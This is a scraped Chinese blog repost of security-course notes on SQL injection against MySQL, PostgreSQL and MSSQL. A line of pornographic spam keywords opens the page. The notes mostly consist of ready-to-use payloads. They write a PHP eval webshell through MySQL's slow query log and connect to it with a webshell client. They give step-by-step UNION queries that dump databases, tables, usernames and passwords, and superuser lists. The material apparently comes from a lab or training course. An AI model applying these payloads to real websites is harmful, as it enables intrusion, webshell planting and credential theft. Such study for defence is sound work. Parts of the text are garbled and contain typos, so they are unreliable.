国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL

這篇具有很好參考價值的文章主要介紹了小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

?文章來源地址http://www.zghlxwxcb.cn/news/detail-828684.html

?#知識點:?

1、SQL 注入-MYSQL 數(shù)據(jù)庫?

2、SQL 注入-MSSQL(SQL server) 數(shù)據(jù)庫?

3、SQL 注入-PostgreSQL 數(shù)據(jù)庫?

#詳細(xì)點:?

Access 無高權(quán)限注入點-只能猜解,還是暴力猜解?

? ? ? ? ?因為access的數(shù)據(jù)庫是獨立存在的,不存在統(tǒng)一管理

對賬號密碼進行猜解,此時只是獲取到后臺的操作權(quán)限,若要獲取到服務(wù)器或網(wǎng)站等高級權(quán)限,需要進一步的提權(quán)操作

?

MYSQL,PostgreSQL,MSSQL 高權(quán)限注入點-可升級讀寫執(zhí)行等?

?

?

操作一:MYSQL——root高權(quán)限讀寫注入

通過mysql對本地文件的讀?。阂话阕x取相關(guān)敏感文件

小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL,web安全,安全,sql

?對本地文件的寫

小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL,web安全,安全,sql

小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL,web安全,安全,sql?

?小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL,web安全,安全,sql

?那么對于讀寫文件針對的則是敏感文件,敏感文件的獲?。?/p>

1.Phpinfo

小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL,web安全,安全,sql

小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL,web安全,安全,sql?

?2.報錯

小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL,web安全,安全,sql

小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL,web安全,安全,sql?

連接菜刀,登入后臺


3.字典
不知道路徑。就不斷爆破虛構(gòu)路徑

?

無法寫入——配置講解:
My.ini:

小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL,web安全,安全,sql—對路徑進行操作限制,只能訪問到值以內(nèi)的路徑

?

突破:注入需要支持SQL環(huán)境,若沒有則使用第三方phpmyadmin或能夠直接連上對方數(shù)據(jù)庫進行繞過

?

1.利用SQL語句,開啟漫游日志:

Set global slow_query_log=1;——開啟日志

Set global slow_query_log_file=’shell路徑’;——令日志內(nèi)容寫入知指定路徑

Select ‘<?php eval()$_GET[A]?>’ or Slepp(10);——在指定文鍵中寫入paylioad,菜刀后臺連接

?

2.進入phpmyadmin:進行修改

?

操作二:PostgreSQL-高權(quán)限讀寫注入

SQL手工注入漏洞測試PostgreSQL數(shù)據(jù)庫:在工具不行的情況下,進行手工注入

-測列數(shù):?

order by 4?

and 1=2 union select null,null,null,null?

-測顯位:第 2,3?

and 1=2 union select 'null',null,null,null 錯誤?

and 1=2 union select null,'null',null,null 正常?

and 1=2 union select null,null,'null',null 正常?

and 1=2 union select null,null,null,'null' 錯誤?

?

-獲取信息:?

and 1=2 UNION SELECT null,version(),null,null?

and 1=2 UNION SELECT null,current_user,null,null?

and 1=2 union select null,current_database(),null,null?

?

-獲取數(shù)據(jù)庫名:?

and 1=2 union select null,string_agg(datname,','),null,null from?

pg_database?

?

-獲取表名:?

and 1=2 union select null,string_agg(tablename,','),null,null?

from pg_tables where schemaname='public'?

and 1=2 union select null,string_agg(relname,','),null,null?

from pg_stat_user_tables?

?

-獲取列名:?

and 1=2 union select null,string_agg(column_name,','),null,null?

from information_schema.columns where table_name='reg_users'?

-獲取數(shù)據(jù):?

and 1=2 union select null,string_agg(name,’,’),string_agg(password,’,’),null from reg_users??

?

-查詢高級用戶

and 1=2 union select null,string_agg(username,’,’),null,null from pg_user where usesuper IS TRuE??

?

高級權(quán)限文件讀寫操作——參考:https://www.freebuf.com/sectool/24937.heml

?

操作三:mssql-高級權(quán)限文件修改

?

判斷注入點:點擊鏈接?

判斷注入類型:看看是整型還是字符型(and 1=1、and 1=2)?

判斷列數(shù):order by n?

判斷顯示位:union all select NULL,NULL......?

爆數(shù)據(jù)庫:?id=2 and 1=2 union all select 1,db_name(),'3',4?

爆表:?id=2 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),'3',4?

爆字段:?id=2 and 1=2 union all select 1,(select username from manage),(select password from manage where username in ('admin_mz')),4 8、MD5解密?

9、登錄,獲取KEY

?

?

到了這里,關(guān)于小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&資源處理拒絕服務(wù))

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&資源處理拒絕服務(wù))

    知識點: 1、CRLF注入-原理檢測利用 2、URL重定向-原理檢測利用 3、Web拒絕服務(wù)-原理檢測利用 #下節(jié)預(yù)告: 1、JSONPCORS跨域 2、域名安全接管劫持 #詳細(xì)點: 1.CRLF注入漏洞,是因為Wb應(yīng)用沒有對用戶輸入做嚴(yán)格驗證,導(dǎo)致攻擊者可以輸入一些 惡意字符。攻擊者一旦向清求行或首部

    2024年01月15日
    瀏覽(31)
  • Web通用漏洞--sql注入

    Web通用漏洞--sql注入

    mysql注入目的:獲取當(dāng)前web權(quán)限 MYSQL--Web組成架構(gòu) 服務(wù)器搭建web服務(wù)可能存在多個站點搭建在一臺服務(wù)器中,數(shù)據(jù)集中存儲在數(shù)據(jù)庫中,因此對數(shù)據(jù)庫的管理也可以分為兩種架構(gòu): 統(tǒng)一用戶管理數(shù)據(jù)庫,即對所有站點數(shù)據(jù)庫的管理均為Root權(quán)限用戶管理 一對一用戶管理數(shù)據(jù)庫

    2024年02月11日
    瀏覽(28)
  • 33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    IIS爆過漏洞的版本:IIS6.0(windows server 2003)、IIS7.0和IIS7.5(windows server 2008) IIS6.0解析漏洞: 文件名:x.asp;x.jpg,jpg的文件后綴名,但是會被解析為asp文件; 目錄名:x.asp/x.jpg, 文件目錄名含有.asp后綴,x.jpg也會被解析為asp文件。 觸發(fā)條件: IIS6.0這個中間件; 上傳文件能不

    2024年01月24日
    瀏覽(31)
  • 第52天:WEB攻防-通用漏洞&弱口令安全&社工字典生成&服務(wù)協(xié)議&Web應(yīng)用

    第52天:WEB攻防-通用漏洞&弱口令安全&社工字典生成&服務(wù)協(xié)議&Web應(yīng)用

    思維導(dǎo)圖 前置知識 案例一:Zblog-密文 MD5 傳輸加密猜解 案例二:服務(wù)類-SSHRDP 遠(yuǎn)程終端猜解 案例三:應(yīng)用類-ZIPWord 文件壓縮包猜解 案例四:github上收集的常見服務(wù)器設(shè)備,協(xié)議,以及常見平臺默認(rèn)密碼 產(chǎn)生原因: 安全意識:自己設(shè)置的xiaojie123弱密碼 初始化:初始密碼為

    2024年04月14日
    瀏覽(25)
  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(WEB攻防-51-WEB攻防-通用漏洞&驗證碼識別&復(fù)用&調(diào)用&找回密碼重定向&狀態(tài)值)

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(WEB攻防-51-WEB攻防-通用漏洞&驗證碼識別&復(fù)用&調(diào)用&找回密碼重定向&狀態(tài)值)

    知識點: 1、找回密碼邏輯機制-回顯驗證碼指向 2、驗證碼驗證安全機制-爆破復(fù)用識別 3、找回密碼客戶端回顯Response狀態(tài)值修改重定向 4、驗證碼技術(shù)驗證碼爆破,驗證碼復(fù)用,驗證碼識別等 詳細(xì)點: 找回密碼流程安全: 1、用回顯狀態(tài)判斷-res前端判斷不安全 2、用用戶名重

    2024年01月16日
    瀏覽(34)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    先自我介紹一下,小編浙江大學(xué)畢業(yè),去過華為、字節(jié)跳動等大廠,目前阿里P7 深知大多數(shù)程序員,想要提升技能,往往是自己摸索成長,但自己不成體系的自學(xué)效果低效又漫長,而且極易碰到天花板技術(shù)停滯不前! 因此收集整理了一份《2024年最新網(wǎng)絡(luò)安全全套學(xué)習(xí)資料》

    2024年04月24日
    瀏覽(49)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    2、解析漏洞-nginx.conf 配置不當(dāng) 二,Web 應(yīng)用編輯器-Ueditor 文件上傳安全 三,實例 CMS平臺-中間件解析編輯器引用 配套資源下載(百度網(wǎng)盤): 鏈接:https://pan.baidu.com/s/11Q9sAPQ9P_ReOP9PKL0ABg?pwd=jgg4? 提取碼:jgg4 本章節(jié)知識點: 1 、中間件安全問題 2 、中間件文件上傳解析 3 、

    2024年04月15日
    瀏覽(28)
  • Web安全:SQL注入漏洞測試.

    Web安全:SQL注入漏洞測試.

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務(wù)端執(zhí)行 ,導(dǎo)致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風(fēng)險。 SQL注

    2024年02月05日
    瀏覽(24)
  • Web安全:SQL注入漏洞測試(防止 黑客利用此漏洞.)

    Web安全:SQL注入漏洞測試(防止 黑客利用此漏洞.)

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務(wù)端執(zhí)行 ,導(dǎo)致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風(fēng)險。 SQL注

    2024年02月13日
    瀏覽(22)
  • web安全漏洞-SQL注入攻擊實驗

    web安全漏洞-SQL注入攻擊實驗

    實驗?zāi)康?學(xué)習(xí)sql顯注的漏洞判斷原理 掌握sqlmap工具的使用 分析SQL注入漏洞的成因 實驗工具 sqlmap是用python寫的開源的測試框架,支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,F(xiàn)irebird,Sybase,SAP,MAXDB并支持6種SQL注入手段。 實驗內(nèi)容 SQL注入(SQL I

    2024年02月06日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包